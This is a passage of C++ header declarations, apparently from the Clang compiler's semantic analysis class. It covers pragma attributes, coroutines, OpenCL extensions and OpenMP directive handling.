void ActOnPragmaAttributeAttribute(ParsedAttr &Attribute,
SourceLocation PragmaLoc,
attr::ParsedSubjectMatchRuleSet Rules);
void ActOnPragmaAttributeEmptyPush(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Called on well-formed '\#pragma clang attribute pop'.
void ActOnPragmaAttributePop(SourceLocation PragmaLoc,
const IdentifierInfo *Namespace);
/// Adds the attributes that have been specified using the
/// '\#pragma clang attribute push' directives to the given declaration.
void AddPragmaAttributes(Scope *S, Decl *D);
void DiagnoseUnterminatedPragmaAttribute();
/// Called on well formed \#pragma clang optimize.
void ActOnPragmaOptimize(bool On, SourceLocation PragmaLoc);
/// Get the location for the currently active "\#pragma clang optimize
/// off". If this location is invalid, then the state of the pragma is "on".
SourceLocation getOptimizeOffPragmaLocation() const {
return OptimizeOffPragmaLocation;
}
/// Only called on function definitions; if there is a pragma in scope
/// with the effect of a range-based optnone, consider marking the function
/// with attribute optnone.
void AddRangeBasedOptnone(FunctionDecl *FD);
/// Adds the 'optnone' attribute to the function declaration if there
/// are no conflicts; Loc represents the location causing the 'optnone'
/// attribute to be added (usually because of a pragma).
void AddOptnoneAttributeIfNoConflicts(FunctionDecl *FD, SourceLocation Loc);
/// AddAlignedAttr - Adds an aligned attribute to a particular declaration.
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
bool IsPackExpansion);
void AddAlignedAttr(Decl *D, const AttributeCommonInfo &CI, TypeSourceInfo *T,
bool IsPackExpansion);
/// AddAssumeAlignedAttr - Adds an assume_aligned attribute to a particular
/// declaration.
void AddAssumeAlignedAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E,
Expr *OE);
/// AddAllocAlignAttr - Adds an alloc_align attribute to a particular
/// declaration.
void AddAllocAlignAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *ParamExpr);
/// AddAlignValueAttr - Adds an align_value attribute to a particular
/// declaration.
void AddAlignValueAttr(Decl *D, const AttributeCommonInfo &CI, Expr *E);
/// AddLaunchBoundsAttr - Adds a launch_bounds attribute to a particular
/// declaration.
void AddLaunchBoundsAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *MaxThreads, Expr *MinBlocks);
/// AddModeAttr - Adds a mode attribute to a particular declaration.
void AddModeAttr(Decl *D, const AttributeCommonInfo &CI, IdentifierInfo *Name,
bool InInstantiation = false);
void AddParameterABIAttr(Decl *D, const AttributeCommonInfo &CI,
ParameterABI ABI);
enum class RetainOwnershipKind {NS, CF, OS};
void AddXConsumedAttr(Decl *D, const AttributeCommonInfo &CI,
RetainOwnershipKind K, bool IsTemplateInstantiation);
/// addAMDGPUFlatWorkGroupSizeAttr - Adds an amdgpu_flat_work_group_size
/// attribute to a particular declaration.
void addAMDGPUFlatWorkGroupSizeAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
/// addAMDGPUWavePersEUAttr - Adds an amdgpu_waves_per_eu attribute to a
/// particular declaration.
void addAMDGPUWavesPerEUAttr(Decl *D, const AttributeCommonInfo &CI,
Expr *Min, Expr *Max);
bool checkNSReturnsRetainedReturnType(SourceLocation loc, QualType type);
//===--------------------------------------------------------------------===//
// C++ Coroutines TS
//
bool ActOnCoroutineBodyStart(Scope *S, SourceLocation KwLoc,
StringRef Keyword);
ExprResult ActOnCoawaitExpr(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult ActOnCoyieldExpr(Scope *S, SourceLocation KwLoc, Expr *E);
StmtResult ActOnCoreturnStmt(Scope *S, SourceLocation KwLoc, Expr *E);
ExprResult BuildResolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
ExprResult BuildUnresolvedCoawaitExpr(SourceLocation KwLoc, Expr *E,
UnresolvedLookupExpr* Lookup);
ExprResult BuildCoyieldExpr(SourceLocation KwLoc, Expr *E);
StmtResult BuildCoreturnStmt(SourceLocation KwLoc, Expr *E,
bool IsImplicit = false);
StmtResult BuildCoroutineBodyStmt(CoroutineBodyStmt::CtorArgs);
bool buildCoroutineParameterMoves(SourceLocation Loc);
VarDecl *buildCoroutinePromise(SourceLocation Loc);
void CheckCompletedCoroutineBody(FunctionDecl *FD, Stmt *&Body);
ClassTemplateDecl *lookupCoroutineTraits(SourceLocation KwLoc,
SourceLocation FuncLoc);
//===--------------------------------------------------------------------===//
// OpenCL extensions.
//
private:
std::string CurrOpenCLExtension;
/// Extensions required by an OpenCL type.
llvm::DenseMap<const Type*, std::set<std::string>> OpenCLTypeExtMap;
/// Extensions required by an OpenCL declaration.
llvm::DenseMap<const Decl*, std::set<std::string>> OpenCLDeclExtMap;
public:
llvm::StringRef getCurrentOpenCLExtension() const {
return CurrOpenCLExtension;
}
/// Check if a function declaration \p FD associates with any
/// extensions present in OpenCLDeclExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromDeclExtMap(FunctionDecl *FD);
/// Check if a function type \p FT associates with any
/// extensions present in OpenCLTypeExtMap and if so return the
/// extension(s) name(s).
std::string getOpenCLExtensionsFromTypeExtMap(FunctionType *FT);
/// Find an extension in an appropriate extension map and return its name
template<typename T, typename MapT>
std::string getOpenCLExtensionsFromExtMap(T* FT, MapT &Map);
void setCurrentOpenCLExtension(llvm::StringRef Ext) {
CurrOpenCLExtension = std::string(Ext);
}
/// Set OpenCL extensions for a type which can only be used when these
/// OpenCL extensions are enabled. If \p Exts is empty, do nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForType(QualType T, llvm::StringRef Exts);
/// Set OpenCL extensions for a declaration which can only be
/// used when these OpenCL extensions are enabled. If \p Exts is empty, do
/// nothing.
/// \param Exts A space separated list of OpenCL extensions.
void setOpenCLExtensionForDecl(Decl *FD, llvm::StringRef Exts);
/// Set current OpenCL extensions for a type which can only be used
/// when these OpenCL extensions are enabled. If current OpenCL extension is
/// empty, do nothing.
void setCurrentOpenCLExtensionForType(QualType T);
/// Set current OpenCL extensions for a declaration which
/// can only be used when these OpenCL extensions are enabled. If current
/// OpenCL extension is empty, do nothing.
void setCurrentOpenCLExtensionForDecl(Decl *FD);
bool isOpenCLDisabledDecl(Decl *FD);
/// Check if type \p T corresponding to declaration specifier \p DS
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledTypeDeclSpec(const DeclSpec &DS, QualType T);
/// Check if declaration \p D used by expression \p E
/// is disabled due to required OpenCL extensions being disabled. If so,
/// emit diagnostics.
/// \return true if type is disabled.
bool checkOpenCLDisabledDecl(const NamedDecl &D, const Expr &E);
//===--------------------------------------------------------------------===//
// OpenMP directives and clauses.
//
private:
void *VarDataSharingAttributesStack;
/// Number of nested '#pragma omp declare target' directives.
unsigned DeclareTargetNestingLevel = 0;
/// Initialization of data-sharing attributes stack.
void InitDataSharingAttributesStack();
void DestroyDataSharingAttributesStack();
ExprResult
VerifyPositiveIntegerConstantInClause(Expr *Op, OpenMPClauseKind CKind,
bool StrictlyPositive = true);
/// Returns OpenMP nesting level for current directive.
unsigned getOpenMPNestingLevel() const;
/// Adjusts the function scopes index for the target-based regions.
void adjustOpenMPTargetScopeIndex(unsigned &FunctionScopesIndex,
unsigned Level) const;
/// Returns the number of scopes associated with the construct on the given
/// OpenMP level.
int getNumberOfConstructScopes(unsigned Level) const;
/// Push new OpenMP function region for non-capturing function.
void pushOpenMPFunctionRegion();
/// Pop OpenMP function region for non-capturing function.
void popOpenMPFunctionRegion(const sema::FunctionScopeInfo *OldFSI);
/// Check if the expression is allowed to be used in expressions for the
/// OpenMP devices.
void checkOpenMPDeviceExpr(const Expr *E);
/// Checks if a type or a declaration is disabled due to the owning extension
/// being disabled, and emits diagnostic messages if it is disabled.
/// \param D type or declaration to be checked.
/// \param DiagLoc source location for the diagnostic message.
/// \param DiagInfo information to be emitted for the diagnostic message.
/// \param SrcRange source range of the declaration.
/// \param Map maps type or declaration to the extensions.
/// \param Selector selects diagnostic message: 0 for type and 1 for
/// declaration.
/// \return true if the type or declaration is disabled.
template <typename T, typename DiagLocT, typename DiagInfoT, typename MapT>
bool checkOpenCLDisabledTypeOrDecl(T D, DiagLocT DiagLoc, DiagInfoT DiagInfo,
MapT &Map, unsigned Selector = 0,
SourceRange SrcRange = SourceRange());
/// Helper to keep information about the current `omp begin/end declare
/// variant` nesting.
struct OMPDeclareVariantScope {
/// The associated OpenMP context selector.
OMPTraitInfo *TI;
/// The associated OpenMP context selector mangling.
std::string NameSuffix;
OMPDeclareVariantScope(OMPTraitInfo &TI);
};
/// The current `omp begin/end declare variant` scopes.
SmallVector<OMPDeclareVariantScope, 4> OMPDeclareVariantScopes;
/// The declarator \p D defines a function in the scope \p S which is nested
/// in an `omp begin/end declare variant` scope. In this method we create a
/// declaration for \p D and rename \p D according to the OpenMP context
/// selector of the surrounding scope.
FunctionDecl *
ActOnStartOfFunctionDefinitionInOpenMPDeclareVariantScope(Scope *S,
Declarator &D);
/// Register \p FD as specialization of \p BaseFD in the current `omp
/// begin/end declare variant` scope.
void ActOnFinishedFunctionDefinitionInOpenMPDeclareVariantScope(
FunctionDecl *FD, FunctionDecl *BaseFD);
public:
/// Can we exit a scope at the moment.
bool isInOpenMPDeclareVariantScope() {
return !OMPDeclareVariantScopes.empty();
}
/// Given the potential call expression \p Call, determine if there is a
/// specialization via the OpenMP declare variant mechanism available. If
/// there is, return the specialized call expression, otherwise return the
/// original \p Call.
ExprResult ActOnOpenMPCall(ExprResult Call, Scope *Scope,
SourceLocation LParenLoc, MultiExprArg ArgExprs,
SourceLocation RParenLoc, Expr *ExecConfig);
/// Handle a `omp begin declare variant`.
void ActOnOpenMPBeginDeclareVariant(SourceLocation Loc, OMPTraitInfo &TI);
/// Handle a `omp end declare variant`.
void ActOnOpenMPEndDeclareVariant();
/// Checks if the variant/multiversion functions are compatible.
bool areMultiversionVariantFunctionsCompatible(
const FunctionDecl *OldFD, const FunctionDecl *NewFD,
const PartialDiagnostic &NoProtoDiagID,
const PartialDiagnosticAt &NoteCausedDiagIDAt,
const PartialDiagnosticAt &NoSupportDiagIDAt,
const PartialDiagnosticAt &DiffDiagIDAt, bool TemplatesSupported,
bool ConstexprSupported, bool CLinkageMayDiffer);
/// Function tries to capture lambda's captured variables in the OpenMP region
/// before the original lambda is captured.
void tryCaptureOpenMPLambdas(ValueDecl *V);
/// Return true if the provided declaration \a VD should be captured by
/// reference.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
/// \param OpenMPCaptureLevel Capture level within an OpenMP construct.
bool isOpenMPCapturedByRef(const ValueDecl *D, unsigned Level,
unsigned OpenMPCaptureLevel) const;
/// Check if the specified variable is used in one of the private
/// clauses (private, firstprivate, lastprivate, reduction etc.) in OpenMP
/// constructs.
VarDecl *isOpenMPCapturedDecl(ValueDecl *D, bool CheckScopeInfo = false,
unsigned StopAt = 0);
ExprResult getOpenMPCapturedExpr(VarDecl *Capture, ExprValueKind VK,
ExprObjectKind OK, SourceLocation Loc);
/// If the current region is a loop-based region, mark the start of the loop
/// construct.
void startOpenMPLoop();
/// If the current region is a range loop-based region, mark the start of the
/// loop construct.
void startOpenMPCXXRangeFor();
/// Check if the specified variable is used in 'private' clause.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
OpenMPClauseKind isOpenMPPrivateDecl(ValueDecl *D, unsigned Level,
unsigned CapLevel) const;
/// Sets OpenMP capture kind (OMPC_private, OMPC_firstprivate, OMPC_map etc.)
/// for \p FD based on DSA for the provided corresponding captured declaration
/// \p D.
void setOpenMPCaptureKind(FieldDecl *FD, const ValueDecl *D, unsigned Level);
/// Check if the specified variable is captured by 'target' directive.
/// \param Level Relative level of nested OpenMP construct for that the check
/// is performed.
bool isOpenMPTargetCapturedDecl(const ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
/// Check if the specified global variable must be captured by outer capture
/// regions.
/// \param Level Relative level of nested OpenMP construct for that
/// the check is performed.
bool isOpenMPGlobalCapturedDecl(ValueDecl *D, unsigned Level,
unsigned CaptureLevel) const;
ExprResult PerformOpenMPImplicitIntegerConversion(SourceLocation OpLoc,
Expr *Op);
/// Called on start of new data sharing attribute block.
void StartOpenMPDSABlock(OpenMPDirectiveKind K,
const DeclarationNameInfo &DirName, Scope *CurScope,
SourceLocation Loc);
/// Start analysis of clauses.
void StartOpenMPClause(OpenMPClauseKind K);
/// End analysis of clauses.
void EndOpenMPClause();
/// Called on end of data sharing attribute block.
void EndOpenMPDSABlock(Stmt *CurDirective);
/// Check if the current region is an OpenMP loop region and if it is,
/// mark loop control variable, used in \p Init for loop initialization, as
/// private by default.
/// \param Init First part of the for loop.
void ActOnOpenMPLoopInitialization(SourceLocation ForLoc, Stmt *Init);
// OpenMP directives and clauses.
/// Called on correct id-expression from the '#pragma omp
/// threadprivate'.
ExprResult ActOnOpenMPIdExpression(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
OpenMPDirectiveKind Kind);
/// Called on well-formed '#pragma omp threadprivate'.
DeclGroupPtrTy ActOnOpenMPThreadprivateDirective(
SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Builds a new OpenMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on Requires directive
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
/// Called on the start of target region i.e. '#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of target region i.e. '#pragme omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
/// Searches for the provided declaration name for OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Finishes analysis of the deferred functions calls that may be declared as
/// host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis(const FunctionDecl *Caller,
const FunctionDecl *Callee,
SourceLocation Loc);
/// Return true inside OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
/// Return true inside OpenMP target region.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of captured region for OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp depobj'.
StmtResult ActOnOpenMPDepobjDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp scan'.
StmtResult ActOnOpenMPScanDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
